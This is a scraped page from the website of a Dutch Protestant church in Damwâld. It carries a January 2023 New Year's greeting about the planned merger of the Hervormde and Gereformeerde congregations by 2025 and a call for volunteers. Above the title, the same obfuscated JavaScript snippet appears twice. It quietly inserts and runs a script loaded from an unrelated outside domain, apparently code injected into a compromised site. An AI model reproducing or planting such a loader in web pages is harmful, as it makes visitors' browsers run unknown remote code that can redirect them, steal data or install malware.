;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuwjaarsgroet - PKN Damwâld

Nieuwjaarsgroet

Gepubliceerd op: donderdag 5 januari 2023

Beste mensen, broeders en zusters van onze gemeente in wording.

Allereerst de beste wensen voor een gezegend nieuw jaar.

Het nieuwe jaar 2023 is begonnen na een geweldige adventstijd en kerstfeest.

Een volle kerk met heel veel kinderen. Kort gezegd een Gods geschenk.

In het nieuwe jaar 2023 bouwen wij verder richting één PKN Gemeente Damwoude.

De fusiecommissie wordt deze maand geïnstalleerd en gaat aan de slag om alle formaliteiten op tijd klaar te hebben om per 01.01.2025 één PKN Gemeente te worden.

Het samenvoegen van onze kerkgemeenschappen (Hervormd en Gereformeerd) krijgt handen en voeten. Hiernaast is er een groep bezig om de wijken te herschikken, uiteraard alles in goed overleg met de wijkteams en (pastorale) ouderlingen. Ook komt er een groep om de onderlinge verbinding in onze gemeente in wording te versterken. De diaconie, kerkrentmeesters en jeugdouderlingen werken al een geruime tijd samen, hier is al sprake een lopende trein.

Wij als kerkenraden willen van alles en vooral belangrijk is het om een geestelijk thuis te vormen voor onze gemeenteleden, vrienden en gasten in één PKN Gemeente.

Met zijn allen Kerk zijn, verbonden met God in Jezus Christus want dat is het allerbelangrijkste.

In het komende jaar worden diverse activiteiten opgezet om elkander meer te ontmoeten.

Te denken valt aan actie “Aan Tafel”, Koffiedrinken en misschien wel een hernieuwde Gemeentezondag Hervormd en Gereformeerd, maar hiervoor is er een groep mensen nodig om dit te organiseren. Meld je aan bij onderstaande personen. Deze oproep geldt ook 30 – 40 jarigen; Juist jullie zijn nodig voor de toekomst en continuïteit.

Laat je horen.

Namens Hervormde Gemeente,                                            Namens Gereformeerde Kerk,

Sjoerd Postma                                                                                 Durk Gros